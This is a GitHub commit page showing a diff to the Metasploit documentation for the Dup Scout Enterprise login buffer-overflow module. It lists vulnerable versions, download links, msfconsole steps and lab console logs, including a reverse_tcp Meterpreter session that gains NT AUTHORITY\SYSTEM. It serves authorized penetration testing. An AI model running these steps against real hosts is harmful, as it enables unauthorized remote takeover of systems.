-
Notifications
You must be signed in to change notification settings - Fork 13.8k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
dup_scout_enterprise_login_bof: Add v9.9.14 target and auto targeting
- Loading branch information
Showing
2 changed files
with
185 additions
and
96 deletions.
There are no files selected for viewing
89 changes: 57 additions & 32 deletions
89
documentation/modules/exploit/windows/http/dup_scout_enterprise_login_bof.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,47 +1,72 @@ | ||
## Vulnerable Application | ||
|
||
Tested on Windows 10 x64 | ||
This module exploits a stack buffer overflow in Dup Scout Enterprise | ||
versions <= 10.0.18. The buffer overflow exists via the web interface | ||
during login. This gives NT AUTHORITY\SYSTEM access. | ||
|
||
Install the application from the link below and enable the web server by going to Tools -> Advanced Options -> Server -> Enable Web Server on Port. | ||
This module has been tested successfully on Dup Scout Enterprise | ||
versions: | ||
|
||
[Dup Scout Enterprise v 10.0.18](https://www.exploit-db.com/apps/84dcc5fe242ca235b67ad22215fce6a8-dupscoutent_setup_v10.0.18.exe) | ||
* 9.9.14 on Windows 7 SP1 (x64) | ||
* 9.9.14 on Windows XP SP0 (x64) | ||
* 10.0.18 on Windows 7 SP1 (x64) | ||
* 10.0.18 on Windows XP SP0 (x86) | ||
* 10.0.18 on Windows 10 (1909) (x64) | ||
|
||
## Verification Steps | ||
|
||
1. Install the application and set the option above to enable the web server | ||
2. Start msfconsole | ||
3. Do: ```use exploit/windows/http/dup_scout_enterprise_login_bof``` | ||
5. Set options and payload | ||
6. Do: ```run``` | ||
7. You should get a shell. | ||
Download: | ||
|
||
## Options | ||
* [Dup Scout Enterprise v9.9.14](https://www.exploit-db.com/apps/d83948ebf4c325eb8d56db6d8649d490-dupscoutent_setup_v9.9.14.exe) | ||
* [Dup Scout Enterprise v10.0.18](https://www.exploit-db.com/apps/84dcc5fe242ca235b67ad22215fce6a8-dupscoutent_setup_v10.0.18.exe) | ||
|
||
**RHOST** | ||
Install the application from the link above and enable the web server by going to | ||
Tools -> Advanced Options -> Server -> Enable Web Server on Port. | ||
|
||
IP address of the remote host running the server. | ||
Metasploit: | ||
|
||
**RPORT** | ||
1. Install the application and set the option above to enable the web server | ||
1. Start msfconsole | ||
1. Do: `use exploit/windows/http/dup_scout_enterprise_login_bof` | ||
1. Do: `set rhosts <rhosts>` | ||
1. Do: `run` | ||
1. You should get a shell. | ||
|
||
Port that the web server is running on. Default is 80 but it can be changed when setting up the program or in the options. | ||
## Options | ||
|
||
## Scenarios | ||
|
||
To obtain a shell: | ||
|
||
``` | ||
msf > use exploit/windows/http/dup_scout_enterprise_login_bof | ||
msf exploit(windows/http/dup_scout_enterprise_login_bof) > set payload windows/meterpreter/reverse_tcp | ||
payload => windows/meterpreter/reverse_tcp | ||
msf exploit(windows/http/dup_scout_enterprise_login_bof) > set rhost 192.168.1.171 | ||
rhost => 192.168.1.171 | ||
msf exploit(windows/http/dup_scout_enterprise_login_bof) > set lhost 192.168.1.252 | ||
lhost => 192.168.1.252 | ||
msf exploit(windows/http/dup_scout_enterprise_login_bof) > run | ||
[*] Started reverse TCP handler on 192.168.1.252:4444 | ||
[*] Generating exploit... | ||
[*] Triggering the exploit now... | ||
[*] Sending stage (179779 bytes) to 192.168.1.171 | ||
[*] Meterpreter session 1 opened (192.168.1.252:4444 -> 192.168.1.171:58969) at 2017-12-09 02:01:41 -0600 | ||
``` | ||
### Dup Scout Enterprise version 10.0.18 (x86) on Windows 10 (1909) (x64) | ||
|
||
``` | ||
msf6 > use exploit/windows/http/dup_scout_enterprise_login_bof | ||
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp | ||
msf6 exploit(windows/http/dup_scout_enterprise_login_bof) > set rhosts 172.16.191.199 | ||
rhosts => 172.16.191.199 | ||
msf6 exploit(windows/http/dup_scout_enterprise_login_bof) > set lhost 172.16.191.192 | ||
lhost => 172.16.191.192 | ||
msf6 exploit(windows/http/dup_scout_enterprise_login_bof) > run | ||
[*] Started reverse TCP handler on 172.16.191.192:4444 | ||
[*] Executing automatic check (disable AutoCheck to override) | ||
[+] The target appears to be vulnerable. Dup Scout Enterprise version 10.0.18. | ||
[*] Selecting a target... | ||
[*] Using target: Dup Scout Enterprise 10.0.18 (x86) | ||
[*] Generating payload ... | ||
[*] Sending payload (10000 bytes) ... | ||
[*] Sending stage (175174 bytes) to 172.16.191.199 | ||
[*] Meterpreter session 1 opened (172.16.191.192:4444 -> 172.16.191.199:50196) at 2021-02-22 21:14:52 -0500 | ||
meterpreter > getuid | ||
Server username: NT AUTHORITY\SYSTEM | ||
meterpreter > sysinfo | ||
Computer : DESKTOP-6VPIDIM | ||
OS : Windows 10 (10.0 Build 18363). | ||
Architecture : x64 | ||
System Language : en_US | ||
Domain : WORKGROUP | ||
Logged On Users : 17 | ||
Meterpreter : x86/windows | ||
meterpreter > | ||
``` | ||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters